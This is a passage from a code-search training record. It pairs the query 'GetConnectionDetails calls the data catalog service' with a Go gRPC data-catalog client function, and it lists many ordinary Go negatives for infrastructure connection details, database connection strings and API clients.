[ "0.61324215", "0.6121006", "0.5922591", "0.5913465", "0.5855348", "0.57932216", "0.5672503", "0.5652811", "0.5633352", "0.56197995", "0.56056327", "0.55719966", "0.5550267", "0.5531591", "0.55035615", "0.5493959", "0.54830974", "0.5474884", "0.5472498", "0.5472352", "0.5417502", "0.5412666", "0.54123414", "0.53931063", "0.53768504", "0.53764343", "0.5371113", "0.5358267", "0.53277177", "0.5304313", "0.5299182", "0.5284881", "0.5266902", "0.5265135", "0.5252032", "0.5237723", "0.523621", "0.5233026", "0.51993483", "0.51936996", "0.5193206", "0.5192442", "0.5185099", "0.51741326", "0.5154729", "0.5152373", "0.5149824", "0.51462686", "0.5137929", "0.5122711", "0.5118473", "0.51148266", "0.5109788", "0.50965387", "0.50955063", "0.5091963", "0.50903726", "0.5065821", "0.50558215", "0.50474876", "0.50252193", "0.50149", "0.50141054", "0.5013948", "0.5012011", "0.5010706", "0.50104916", "0.5006819", "0.500478", "0.50045085", "0.49971998", "0.4995431", "0.49802238", "0.49780104", "0.49765", "0.49719524", "0.49658394", "0.49566525", "0.49497154", "0.49492452", "0.49481618", "0.4947742", "0.49472705", "0.49422157", "0.49373624", "0.49274793", "0.49272978", "0.49165225", "0.49161637", "0.49100557", "0.49098694", "0.49046102", "0.49011788", "0.48967537", "0.48924825", "0.4891817", "0.48861316", "0.487806", "0.4862294", "0.48613954" ]
0.68500125
0
GetConnectionDetails calls the data catalog service
func GetConnectionDetails(datasetID string, req *modules.DataInfo, input *app.M4DApplication) error { // Set up a connection to the data catalog interface server. conn, err := grpc.Dial(utils.GetDataCatalogServiceAddress(), grpc.WithInsecure(), grpc.WithBlock()) if err != nil { return err } defer conn.Close() c := dc.NewDataCatalogServiceClient(conn) // Contact the server and print out its response. ctx, cancel := context.WithTimeout(context.Background(), time.Minute) defer cancel() response, err := c.GetDatasetInfo(ctx, &dc.CatalogDatasetRequest{ AppId: utils.CreateAppIdentifier(input), DatasetId: datasetID, }) if err != nil { return err } req.DataDetails = response.GetDetails().DeepCopy() return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func GetConnectionDetails(req *modules.DataInfo, input *app.M4DApplication) error {\n\t// Set up a connection to the data catalog interface server.\n\tconn, err := grpc.Dial(utils.GetDataCatalogServiceAddress(), grpc.WithInsecure(), grpc.WithBlock())\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\tc := dc.NewDataCatalogServiceClient(conn)\n\n\t// Contact the server and print out its response.\n\tctx, cancel := context.WithTimeout(context.Background(), time.Minute)\n\tdefer cancel()\n\n\tresponse, err := c.GetDatasetInfo(ctx, &dc.CatalogDatasetRequest{\n\t\tAppId: utils.CreateAppIdentifier(input),\n\t\tDatasetId: req.Context.DataSetID,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tdetails := response.GetDetails()\n\n\tprotocol, err := utils.GetProtocol(details)\n\tif err != nil {\n\t\treturn err\n\t}\n\tformat, err := utils.GetDataFormat(details)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tconnection, err := serde.ToRawExtension(details.DataStore)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treq.DataDetails = &modules.DataDetails{\n\t\tName: details.Name,\n\t\tInterface: app.InterfaceDetails{\n\t\t\tProtocol: protocol,\n\t\t\tDataFormat: format,\n\t\t},\n\t\tGeography: details.Geo,\n\t\tConnection: *connection,\n\t}\n\n\treturn nil\n}", "func GetConnectionDetails(ctx context.Context, cluster *kubernetes.Cluster, secretNamespace, secretName string) (*ConnectionDetails, error) {\n\tdetails := ConnectionDetails{RegistryCredentials: []RegistryCredentials{}}\n\n\tsecret, err := cluster.GetSecret(ctx, secretNamespace, secretName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar dockerconfigjson DockerConfigJSON\n\terr = json.Unmarshal(secret.Data[\".dockerconfigjson\"], &dockerconfigjson)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tdetails.Namespace = secret.ObjectMeta.Annotations[RegistrySecretNamespaceAnnotationKey]\n\n\tfor url, auth := range dockerconfigjson.Auths {\n\t\tdetails.RegistryCredentials = append(details.RegistryCredentials, RegistryCredentials{\n\t\t\tURL: url,\n\t\t\tUsername: auth.Username,\n\t\t\tPassword: auth.Password,\n\t\t})\n\t}\n\n\treturn &details, nil\n}", "func (tr *Service) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *CapacityProvider) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *MongoCollection) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *CassandraKeySpace) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *Account) GetConnectionDetailsMapping() map[string]string {\n\treturn map[string]string{\"connection_strings[*]\": \"status.atProvider.connectionStrings[*]\", \"primary_key\": \"status.atProvider.primaryKey\", \"primary_master_key\": \"status.atProvider.primaryMasterKey\", \"primary_readonly_key\": \"status.atProvider.primaryReadonlyKey\", \"primary_readonly_master_key\": \"status.atProvider.primaryReadonlyMasterKey\", \"secondary_key\": \"status.atProvider.secondaryKey\", \"secondary_master_key\": \"status.atProvider.secondaryMasterKey\", \"secondary_readonly_key\": \"status.atProvider.secondaryReadonlyKey\", \"secondary_readonly_master_key\": \"status.atProvider.secondaryReadonlyMasterKey\"}\n}", "func (tr *MongoDatabase) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *SQLDatabase) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *SQLContainer) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *SQLStoredProcedure) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *Cluster) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func GetConnectionDetails(device *packngo.Device) managed.ConnectionDetails {\n\t// RootPassword is only in the device responses for 24h\n\t// TODO(displague) Handle devices without public IPv4\n\tif device.RootPassword == \"\" || device.GetNetworkInfo().PublicIPv4 == \"\" {\n\t\treturn managed.ConnectionDetails{}\n\t}\n\n\t// TODO(displague) device.User is in the API but not included in packngo\n\tuser := \"root\"\n\tport := \"22\" // ssh\n\n\treturn managed.ConnectionDetails{\n\t\txpv1.ResourceCredentialsSecretEndpointKey: []byte(device.GetNetworkInfo().PublicIPv4),\n\t\txpv1.ResourceCredentialsSecretUserKey: []byte(user),\n\t\txpv1.ResourceCredentialsSecretPasswordKey: []byte(device.RootPassword),\n\t\txpv1.ResourceCredentialsSecretPortKey: []byte(port),\n\t}\n}", "func (tr *CassandraTable) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *SQLFunction) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *GremlinDatabase) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func GetCatalogDetails() string {\n\tvar s string\n\tfor _, book := range GetAllMappedBooks() {\n\t\ts += GetBookDetails(book.ID)\n\t}\n\n\treturn s\n}", "func (tr *Table) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (c DBConfig) ConnectionInfo() string {\n\n\tswitch c.DBDialect {\n\tcase \"postgres\":\n\t\tif c.Password == \"\" {\n\t\t\treturn fmt.Sprintf(\"host=%s port=%d user=%s dbname=%s sslmode=disable\", c.Host, c.Port, c.Usr, c.Name)\n\t\t}\n\t\treturn fmt.Sprintf(\"host=%s port=%d user=%s password=%s dbname=%s sslmode=disable\", c.Host, c.Port, c.Usr, c.Password, c.Name)\n\n\tcase \"mssql\":\n\t\treturn fmt.Sprintf(\"sqlserver://%s:%s@l%s:%d?database=%s\", c.Usr, c.Password, c.Host, c.Port, c.Name)\n\n\tcase \"hdb\":\n\t\treturn fmt.Sprintf(\"hdb://%s:%s@%s:%d\", c.Usr, c.Password, c.Host, c.Port)\n\n\tcase \"sqlite\":\n\t\treturn fmt.Sprintf(\"%s\", c.Name)\n\n\tcase \"mysql\":\n\t\treturn fmt.Sprintf(\"%s:%s@tcp(%s:%d)/%s?charset=utf8&parseTime=True&loc=Local\", c.Usr, c.Password, c.Host, c.Port, c.Name)\n\n\tdefault:\n\t\tpanic(fmt.Errorf(\"dialect %s is not recognized\", c.DBDialect))\n\n\t}\n}", "func GetConnectionDetails(in v1beta1.Queue) managed.ConnectionDetails {\n\tif in.Status.AtProvider.URL == \"\" {\n\t\treturn nil\n\t}\n\treturn managed.ConnectionDetails{\n\t\txpv1.ResourceCredentialsSecretEndpointKey: []byte(in.Status.AtProvider.URL),\n\t}\n}", "func (tr *NotebookWorkspace) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *TaskDefinition) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (r *ProtocolIncus) GetConnectionInfo() (*ConnectionInfo, error) {\n\tinfo := ConnectionInfo{}\n\tinfo.Certificate = r.httpCertificate\n\tinfo.Protocol = \"incus\"\n\tinfo.URL = r.httpBaseURL.String()\n\tinfo.SocketPath = r.httpUnixPath\n\n\tinfo.Project = r.project\n\tif info.Project == \"\" {\n\t\tinfo.Project = \"default\"\n\t}\n\n\tinfo.Target = r.clusterTarget\n\tif info.Target == \"\" && r.server != nil {\n\t\tinfo.Target = r.server.Environment.ServerName\n\t}\n\n\turls := []string{}\n\tif r.httpProtocol == \"https\" {\n\t\turls = append(urls, r.httpBaseURL.String())\n\t}\n\n\tif r.server != nil && len(r.server.Environment.Addresses) > 0 {\n\t\tfor _, addr := range r.server.Environment.Addresses {\n\t\t\tif strings.HasPrefix(addr, \":\") {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\turl := fmt.Sprintf(\"https://%s\", addr)\n\t\t\tif !shared.StringInSlice(url, urls) {\n\t\t\t\turls = append(urls, url)\n\t\t\t}\n\t\t}\n\t}\n\n\tinfo.Addresses = urls\n\n\treturn &info, nil\n}", "func (tr *GremlinGraph) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (tr *SQLTrigger) GetConnectionDetailsMapping() map[string]string {\n\treturn nil\n}", "func (s *Simple) GetConnectionData() json.RawMessage {\n\n\tauthentication := MetaAuthentication{Action: \"authenticate\", Resource: s.Resource}\n\tauthentication.Type = s.BusinessId + \".\" + s.DeploymentId + \".simple\"\n\tdata := loginData{Login: s.Login, Password: s.Password}\n\tauthentication.Data = data\n\n\textAuthent := ExtAuthent{Authentication: authentication}\n\treturnByteArray, _ := json.Marshal(extAuthent)\n\n\tgo s.waitForHandshake()\n\n\treturn json.RawMessage(returnByteArray)\n}", "func (c PostgresConfig) ConnectionInfo() string {\n\tif c.Password == \"\" {\n\t\treturn fmt.Sprintf(\"host=%s port=%d user=%s dbname=%s sslmode=disable\",\n\t\t\tc.Host, c.Port, c.User, c.Name)\n\t}\n\treturn fmt.Sprintf(\"host=%s port=%d user=%s password=%s dbname=%s sslmode=disable\",\n\t\tc.Host, c.Port, c.User, c.Password, c.Name)\n}", "func (mg *OpenIDConnectProvider) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *SQLContainer) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *MongoCollection) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *CassandraKeySpace) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (_Energyconsumption *EnergyconsumptionCallerSession) GetConsAccntDetails(_consAccntAddr common.Address) (string, string, uint32, string, uint32, uint32, string, error) {\n\treturn _Energyconsumption.Contract.GetConsAccntDetails(&_Energyconsumption.CallOpts, _consAccntAddr)\n}", "func (mg *Subnetwork) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (_Energyconsumption *EnergyconsumptionSession) GetConsAccntDetails(_consAccntAddr common.Address) (string, string, uint32, string, uint32, uint32, string, error) {\n\treturn _Energyconsumption.Contract.GetConsAccntDetails(&_Energyconsumption.CallOpts, _consAccntAddr)\n}", "func (mg *SQLFunction) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *SQLDatabase) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *MongoDatabase) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *ManagedSSLCertificate) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *SQLStoredProcedure) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (a *DeploymentsApiService) ApiDeploymentsIdConnectionInfoGet(ctx context.Context, id string) ApiApiDeploymentsIdConnectionInfoGetRequest {\n\treturn ApiApiDeploymentsIdConnectionInfoGetRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t\tid: id,\n\t}\n}", "func GetConnectionString() string {\n\treturn fmt.Sprintf(\"host=%s port=%d user=%s password=%s dbname=%s sslmode=disable\", host, port, user, password, dbname)\n}", "func (c *Client) GetDataSetDetails(ctx context.Context, params *GetDataSetDetailsInput, optFns ...func(*Options)) (*GetDataSetDetailsOutput, error) {\n\tif params == nil {\n\t\tparams = &GetDataSetDetailsInput{}\n\t}\n\n\tresult, metadata, err := c.invokeOperation(ctx, \"GetDataSetDetails\", params, optFns, c.addOperationGetDataSetDetailsMiddlewares)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tout := result.(*GetDataSetDetailsOutput)\n\tout.ResultMetadata = metadata\n\treturn out, nil\n}", "func (mg *GremlinDatabase) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *CassandraTable) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (m *AccessPackage) GetCatalog()(AccessPackageCatalogable) {\n return m.catalog\n}", "func GetDbConnectionURL() string {\n\tvar dbinfo string\n\n\tif c.dbEnv != \"\" {\n\t\tif containsDbConfiguration() {\n\t\t\tlog.Print(\"INFO - Configuration file contains environment setup , all others setup for db will be ignored (host,user,password,dbname,port)\")\n\t\t}\n\t\treturn os.Getenv(c.dbEnv)\n\t} else if c.db.password == \"\" {\n\t\tdbinfo = fmt.Sprintf(\"user=%s dbname=%s sslmode=disable\",\n\t\t\tc.db.user, c.db.db)\n\t} else {\n\t\tdbinfo = fmt.Sprintf(\"user=%s password=%s dbname=%s sslmode=disable\",\n\t\t\tc.db.user, c.db.password, c.db.db)\n\t}\n\treturn dbinfo\n}", "func (mg *Network) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (_Energyconsumption *EnergyconsumptionCaller) GetConsAccntDetails(opts *bind.CallOpts, _consAccntAddr common.Address) (string, string, uint32, string, uint32, uint32, string, error) {\n\tvar (\n\t\tret0 = new(string)\n\t\tret1 = new(string)\n\t\tret2 = new(uint32)\n\t\tret3 = new(string)\n\t\tret4 = new(uint32)\n\t\tret5 = new(uint32)\n\t\tret6 = new(string)\n\t)\n\tout := &[]interface{}{\n\t\tret0,\n\t\tret1,\n\t\tret2,\n\t\tret3,\n\t\tret4,\n\t\tret5,\n\t\tret6,\n\t}\n\terr := _Energyconsumption.contract.Call(opts, out, \"getConsAccntDetails\", _consAccntAddr)\n\treturn *ret0, *ret1, *ret2, *ret3, *ret4, *ret5, *ret6, err\n}", "func (sci SQLConnectionInfo) AsConnectionInfo() (*ConnectionInfo, bool) {\n\treturn nil, false\n}", "func (q *quicTracer) getConnectionsInfo() (conns []connInfo) {\n\tq.mu.Lock()\n\tdefer q.mu.Unlock()\n\n\tfor _, tracer := range q.tracers {\n\t\tconns = append(conns, connInfo{\n\t\t\tid: tracer.id,\n\t\t\tpackets: tracer.packets,\n\t\t})\n\t}\n\n\treturn conns\n}", "func (mg *GremlinGraph) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (sdk *SDKSteps) GetConnection(from, to string) (*didexClient.Connection, error) {\n\tconnections, err := sdk.context.DIDExchangeClients[from].QueryConnections(&didexClient.QueryConnectionsParams{})\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"%s failed to fetch their connections : %w\", from, err)\n\t}\n\n\tfor _, c := range connections {\n\t\tif c.TheirLabel == to {\n\t\t\treturn c, nil\n\t\t}\n\t}\n\n\treturn nil, fmt.Errorf(\"no connection %s -> %s\", from, to)\n}", "func (mg *InstanceProfile) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *Instance) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *AccessKey) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *Group) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *Policy) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *Account) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (a *ibmcAccessDetails) DriverInfo(bmcCreds Credentials) map[string]interface{} {\n\n\tibmcAddress := []string{}\n\tschemes := strings.Split(a.bmcType, \"+\")\n\tif len(schemes) > 1 {\n\t\tibmcAddress = append(ibmcAddress, schemes[1])\n\t} else {\n\t\tibmcAddress = append(ibmcAddress, ibmcDefaultScheme)\n\t}\n\tibmcAddress = append(ibmcAddress, \"://\")\n\tibmcAddress = append(ibmcAddress, a.host)\n\tibmcAddress = append(ibmcAddress, a.path)\n\n\tresult := map[string]interface{}{\n\t\t\"ibmc_username\": bmcCreds.Username,\n\t\t\"ibmc_password\": bmcCreds.Password,\n\t\t\"ibmc_address\": strings.Join(ibmcAddress, \"\"),\n\t}\n\n\tif a.disableCertificateVerification {\n\t\tresult[\"ibmc_verify_ca\"] = false\n\t}\n\n\treturn result\n}", "func (mg *Router) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *Role) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func GetInfoFromConnection(conn *amqp.Connection) ConnectionInfo {\n\treturn ConnectionInfo{\n\t\tVhost: conn.Config.Vhost,\n\t\tMajor: conn.Major,\n\t\tMinor: conn.Minor,\n\t\tLocales: conn.Locales,\n\t\tServer: conn.Properties,\n\t\tChannelMax: conn.Config.ChannelMax,\n\t\tFrameSize: conn.Config.FrameSize,\n\t\tHeartbeat: conn.Config.Heartbeat,\n\t\tLocale: conn.Config.Locale,\n\t\tProperties: conn.Config.Properties,\n\t\tTLS: conn.Config.TLSClientConfig,\n\t}\n}", "func (mg *Firewall) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (i *Info) GetDetails() (customerInfo *models.CustomerInfo, err error) {\n\tcustomerInfo = new(models.CustomerInfo)\n\n\terr = DB.Select().\n\t\tFrom(\"view_customer_info\").\n\t\tWhere(dbx.HashExp{\"customer_id\": i.cs.CustomerID}).\n\t\tOne(customerInfo)\n\tif err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\terr = ErrCustomerNotFound\n\t\t}\n\t\treturn nil, err\n\t}\n\n\treturn\n}", "func GetConnStr(address, user, pass, catalog string) string {\n\tformat := \"https://%s:%s@%s?custom_client=insight&catalog=%s\"\n\tconnStr := fmt.Sprintf(format, user, pass, address, catalog)\n\treturn connStr\n}", "func (mg *User) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (client *WANIPConnection1) GetConnectionTypeInfoCtx(\n\tctx context.Context,\n) (NewConnectionType string, NewPossibleConnectionTypes string, err error) {\n\t// Request structure.\n\trequest := interface{}(nil)\n\t// BEGIN Marshal arguments into request.\n\n\t// END Marshal arguments into request.\n\n\t// Response structure.\n\tresponse := &struct {\n\t\tNewConnectionType string\n\t\tNewPossibleConnectionTypes string\n\t}{}\n\n\t// Perform the SOAP call.\n\tif err = client.SOAPClient.PerformActionCtx(ctx, URN_WANIPConnection_1, \"GetConnectionTypeInfo\", request, response); err != nil {\n\t\treturn\n\t}\n\n\t// BEGIN Unmarshal arguments from response.\n\n\tif NewConnectionType, err = soap.UnmarshalString(response.NewConnectionType); err != nil {\n\t\treturn\n\t}\n\tif NewPossibleConnectionTypes, err = soap.UnmarshalString(response.NewPossibleConnectionTypes); err != nil {\n\t\treturn\n\t}\n\t// END Unmarshal arguments from response.\n\treturn\n}", "func (sci SQLConnectionInfo) AsBasicConnectionInfo() (BasicConnectionInfo, bool) {\n\treturn &sci, true\n}", "func (mg *SQLTrigger) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *Table) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (mg *NotebookWorkspace) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (t TenantConnectionInformation) GetConnection() (*gorm.DB, error) {\n\n\tif len(strings.TrimSpace(t.ConnectionString)) == 0 {\n\t\treturn nil, errors.New(\"Connection string was not found or was empty..\")\n\t}\n\n\tdb, err := gorm.Open(\"postgres\", t.ConnectionString)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn db, nil\n}", "func (o DatabaseAccountConnectionStringResponseOutput) ConnectionString() pulumi.StringOutput {\n\treturn o.ApplyT(func(v DatabaseAccountConnectionStringResponse) string { return v.ConnectionString }).(pulumi.StringOutput)\n}", "func (mg *RouterNAT) GetPublishConnectionDetailsTo() *xpv1.PublishConnectionDetailsTo {\n\treturn mg.Spec.PublishConnectionDetailsTo\n}", "func (a *CloudCostBudgetsApiService) GetCostDetails(ctx context.Context, accountIdentifier string, id string) (ResponseDtoBudgetData, *http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = strings.ToUpper(\"Get\")\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue ResponseDtoBudgetData\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/ccm/api/budgets/{id}/costDetails\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"id\"+\"}\", fmt.Sprintf(\"%v\", id), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\tlocalVarQueryParams.Add(\"accountIdentifier\", parameterToString(accountIdentifier, \"\"))\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\tif ctx != nil {\n\t\t// API Key Authentication\n\t\tif auth, ok := ctx.Value(ContextAPIKey).(APIKey); ok {\n\t\t\tvar key string\n\t\t\tif auth.Prefix != \"\" {\n\t\t\t\tkey = auth.Prefix + \" \" + auth.Key\n\t\t\t} else {\n\t\t\t\tkey = auth.Key\n\t\t\t}\n\t\t\tlocalVarHeaderParams[\"x-api-key\"] = key\n\n\t\t}\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tif localVarHttpResponse.StatusCode < 300 {\n\t\t// If we succeed, return the data, otherwise pass on to decode error.\n\t\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\tif err == nil {\n\t\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t\t}\n\t}\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericSwaggerError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 400 {\n\t\t\tvar v Failure\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 500 {\n\t\t\tvar v ModelError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 0 {\n\t\t\tvar v ResponseDtoBudgetData\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHttpResponse, nil\n}", "func (t *TMDB) NetworkDetails(id int64) (*CompanyDetails, error) {\n\tc := new(CompanyDetails)\n\tif err := t.get(c, fmt.Sprintf(\"/3/network/%d\", id), url.Values{}); err != nil {\n\t\treturn nil, err\n\t}\n\treturn c, nil\n}", "func getConsumber(c *cli.Context) error {\n\tid := c.String(\"id\")\n\tusername := c.String(\"username\")\n\n\tvar requestURL string\n\tif id != \"\" {\n\t\trequestURL = fmt.Sprintf(\"%s/%s\", CONSUMER_RESOURCE_OBJECT, id)\n\t} else if username != \"\" {\n\t\trequestURL = fmt.Sprintf(\"%s/%s\", CONSUMER_RESOURCE_OBJECT, username)\n\t} else {\n\t\treturn fmt.Errorf(\"username and id invalid.\")\n\t}\n\n\tctx, cannel := context.WithTimeout(context.Background(), 30*time.Second)\n\tdefer cannel()\n\n\tserverResponse, err := client.GatewayClient.Get(ctx, requestURL, nil, nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbody, err := ioutil.ReadAll(serverResponse.Body)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttools.IndentFromBody(body)\n\n\treturn nil\n}", "func (m *ExternalConnection) GetDescription()(*string) {\n return m.description\n}", "func (ci ConnectionInfo) AsConnectionInfo() (*ConnectionInfo, bool) {\n\treturn &ci, true\n}", "func (f *IBMPICloudConnectionClient) GetAll(powerinstanceid string, timeout time.Duration) (*models.CloudConnections, error) {\n\n\tparams := p_cloud_cloud_connections.NewPcloudCloudconnectionsGetallParamsWithTimeout(timeout).WithCloudInstanceID(powerinstanceid)\n\tresp, err := f.session.Power.PCloudCloudConnections.PcloudCloudconnectionsGetall(params, ibmpisession.NewAuth(f.session, powerinstanceid))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"Failed to get all cloud connection %s\", err)\n\t}\n\treturn resp.Payload, nil\n}", "func (client *WANPPPConnection1) GetConnectionTypeInfoCtx(\n\tctx context.Context,\n) (NewConnectionType string, NewPossibleConnectionTypes string, err error) {\n\t// Request structure.\n\trequest := interface{}(nil)\n\t// BEGIN Marshal arguments into request.\n\n\t// END Marshal arguments into request.\n\n\t// Response structure.\n\tresponse := &struct 